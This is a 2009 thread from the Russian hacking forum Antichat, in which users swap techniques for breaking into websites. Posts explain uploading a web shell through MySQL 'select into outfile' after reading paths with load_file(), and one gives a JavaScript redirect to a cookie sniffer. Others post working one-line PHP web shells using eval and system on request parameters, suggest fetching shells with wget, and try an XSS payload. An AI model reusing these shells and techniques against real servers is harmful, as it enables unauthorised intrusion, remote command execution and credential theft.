Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

08.07.2009, 14:47
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме: 110445
Репутация:
1
|
|
Сообщение от geezer.code
Hello,
To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com
but under some circumbstances you won't need a mysql root password.
If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility.
FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function.
if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords).
thanks for help body really appreciated
|
|
|

08.07.2009, 17:58
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
Ershik, во первых не cals.exe, а calc.exe
и во вторых - может там полный путь надо или еще чо..
|
|
|

08.07.2009, 17:59
|
|
Познающий
Регистрация: 26.12.2008
Сообщений: 42
Провел на форуме: 211850
Репутация:
59
|
|
PaCo Респект
Относительно слива БД MySQL с правами INSERT:
PaCo
я уже отправил тебе сообщение в личку.
Всем остальным тоже спасибо за ответы, но прав Root у меня естественно нет! 
Поэтому если кто нибудь знает методы повышения привилегий пользователя (хотябы до SELECT) буду рад услышать!
|
|
|

09.07.2009, 00:32
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
Сообщение от L I G A
<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>
Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.
|
|
|

09.07.2009, 00:41
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Кто нибуть может дать пример кода при котором можно выполнять команды с удаленного компьютера?(php сам знаю чуток но не представляю как это должно выглядеть)(интересно просто пощупать это так как с помощью этого взломали 2ip кто помнит(через whois проходила команда любая))
|
|
|

09.07.2009, 00:47
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
PHP код:
<?php eval($_REQUEST[ev]); ?>
PHP код:
<?php system($_REQUEST[ev]); ?>
Щупай 
|
|
|

09.07.2009, 00:47
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
diznt, смотри сорцы любого шелла.
|
|
|

09.07.2009, 00:58
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от jokester
PHP код:
<?php eval($_REQUEST[ev]); ?>
PHP код:
<?php system($_REQUEST[ev]); ?>
Щупай 
а ну так это то понятно!
Но каким методом был взломан через whois(2ip.ru)? Или можно как то whois проверить через командную строку?
|
|
|

09.07.2009, 01:08
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
diznt, ну хз, как там был взломан, он, но если там можно выпонлять любые команты, то могли залить шелл, как угодно. "copy", "wget", etc...
|
|
|

09.07.2009, 02:01
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Ладно...
Такой вопрос... Как залить шелл через картинку?
Пробывал для теста в коментах картинки оставить код <html><script>alert('xss!')</script></html>
Но при переходе на картинку нету xss(
(через ie 6 заходил)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|